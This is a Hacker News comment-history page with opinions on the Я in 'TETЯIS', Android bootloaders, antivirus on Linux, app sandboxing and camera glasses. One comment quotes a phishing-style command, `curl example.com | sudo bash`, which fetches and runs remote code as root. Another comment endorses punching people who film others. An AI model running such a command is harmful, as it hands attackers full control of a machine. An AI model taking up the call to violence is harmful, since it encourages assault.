Hacker Newsnew | past | comments | ask | show | jobs | submit | codedokode's commentslogin

And also you can masquerade political ads as ads for a newspaper article, for example: "Governor A opens a new school" or "Party A declares amazing plans for next 5 years" (actually done here by ruling party, to work around election ad laws and limitations).

It is weird how they use the letter Я ("ya") as a "Russian" version of R. The Russian (actually Cyrillic) version of R is "P". So I read the name with flipped "R" as "Tetyais" and it makes no sense.

Also I wonder how Vadim Gerasimov managed to obtain an IBM PC-compatible computer: where he got the money and what store would be selling that. This shows how unequal and unfair the society became when reforms began at the late USSR. In earlier USSR, everybody would equally and fairly have no computer.



This can't be the first time you're seeing such use of Я? It's very commonly used in Western typography / graphic design as a symbol to invoke associations with Russia. It's not being used as a Cyrillic letter, it's being used a "think of Russia" and people unfamiliar with Cyrillic will mentally associate it with R so TETЯIS is easily read as "tetris". Even if yes, people familiar with the alphabet find it harder because the first reaction to Я is to in fact read it correctly.

Same with Σ being used as a "think of Greece" symbol that people from Latin-script languages are expected to process as E, leading to "brilliant" designs in GRΣΣK. Or how the Chinese character 山 would remind a Russian speaker of Ш so ПО山ЛИ would be easy to read.


As a Russian programmer, certainly you are aware of Elektronika 60 and Dorodnitsyn Computing Center? Regarding я, it is the same shape as R but backwards and feels exotic, nothing too complex there.

What I do not like about Android is how difficult it is to unlock the bootloader without ever connecting the device to Internet. Any device with flash memory should be re-programmable and it should be illegal to prevent user from doing this or adding measures (like locking components to CPU via cryptography or adding anti-reverse engineering measures) that make it difficult.

Antivirus is not a bad thing. Imagine running a company where there are 100 employees that click every link and open every attachment. Definitely safer with an antivirus.

I imagined it with employees on Linux and it wasn't clear to me it's definitely safer with an antivirus software. You are just stating things without explaining yourself...

Maybe you’re imagining no local privilege escalation vulnerabilities. Those are low severity in general, but if you can get a user to run something it’s all over.

How much do I need to go on? A foothold on a local computer allows the attacker to spread horizontally across your network.

It’s just a matter of time before you’re fighting real-time AI-driven attacks (most sites aren’t yet). Good luck even with your antivirus. Which I agree is going to be one of the footholds that is used against you.


how? if there's hundreds of employees and one of them downloads something that's detectable, you've now prevented a disaster that otherwise wouldn't have

Imagine they got an email from the HR department that says that they must copy `curl example.com | sudo bash` to prove they are human and get their salary...

That's only because Linux doesn't have working antivirus though. If it did, you'd want it.

Or... working viruses on Linuxes, for that matter. They always throw something about needing glibc x.x.x or higher.

Technically most malware should generally be able to rely on the syscall interface, no? As generally it doesn’t need a GUI or anything

npm viruses were pretty successful

Who hosts npm? Oh same same!

No, it is unfit for this purpose. The reason is:

- you need to specify the rules before starting an application. How one is supposed to guess what application will do? Figuring out the correct rules may take lot of time and is impossible for non-programmers. Imagine I want to install 10 apps per day and they should work perfectly, how much time will I be spending writing rules?

- the rules cannot be changed in runtime, for example, giving access to a camera for 1 minute

- the rules are too limited. You can restrict access to a file, but can you restrict access to a DBUS bus? Can you restrict access to audio, video, GPU etc? To /proc filesystem? To a DNS domain? The rules feel like they were written for computers with teletypes from 70s and not for modern machines.

- they do not allow providing fake data, for example, a fake list of WiFi points so that the app thinks it has the access to your geolocation while in reality is doesn't.

So it is some outdated technology unfit for modern day.

What does a user want? The user wants to be able to run anything without any risk and without writing any config files. Obviously it takes a skill to write such OS, and there is definitely a lack of people with this skill among Linux distribution creators.

A system where installation is done using "curl + sudo bash" is the opposite of a safe OS.


>Imagine I want to install 10 apps per day

Either you're engaged in some large-scale testing operation and your automation already handles it, or something has gone terribly wrong and the inconvenience of the sandboxing UI is the least of your concerns.


So your solution is that general purpose computers should be restricted in which code they can run.

No, the point is that the amount of friction you can add to new app installs is much higher if you don’t optimize it for the unlikely case that your user is an app reviewer.

No, the point is that every time your computer isn't doing something you want it to do, you should be able to download a software package to make it do that.

Yes, but not 10 times a day every day. No one’s doing that.

> A system where installation is done using "curl + sudo bash" is the opposite of a safe OS.

not clear at all. E.g. on QubesOS this could be fine


It could be harmless, but never fine.

> I can't wait for smart glasses with facial recognition and a name tag that hovers over everyone.

What stops you from using a notepad? I do not want my face uploaded to Facebook.


People don't generally tolerate me sticking a nametag on them... And they certainly don't tend to wear it for future events where we are both present.

A local only face recognizer with consent of the face owners would be pretty useful for me. Although it would require a lot of 'hey, I'm bad at faces and names, do you mind if I take a picture so baby skynet can help me out?'


Would they ask the person to hold their name tag over their head, or just require everyone to tape it to their forehead?

A person is being treated disrespectfully and your point is that they should do nothing with it. Filming without permission is no different than harassing or bullying. A weak person would bear with it, a strong one would punch in the face.

>Filming without permission is no different than harassing or bullying.

Since you used the most generic language possible, I guess me filming my nephew blowing on the cadles at his 8th birthday is harrassing and bullying and I should expect a punch in the face


There is not only law but respect and politeness. If you disrespect other people do not expect being treated respectfully.

So, do you have proof those particular employees disrespected other people and deserved the disrespect?

They made the glasses for filming people without permission?

Care to provide some proof they have? All I have read and seen points to them simply being Meta employees

Didn't Meta make the glasses in question?

That would be the right thing. You want to film something, you don't use people passing by as a free extra and don't publish the details where and with whom they were going online. Is is just some American thing that they do not care about feelings of other people.

If you have any respect, don't film other people or at least blur them.


Yes but isn't that what those glasses were made for by those Meta employees?

If your can back that up with a source I would love to see it.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: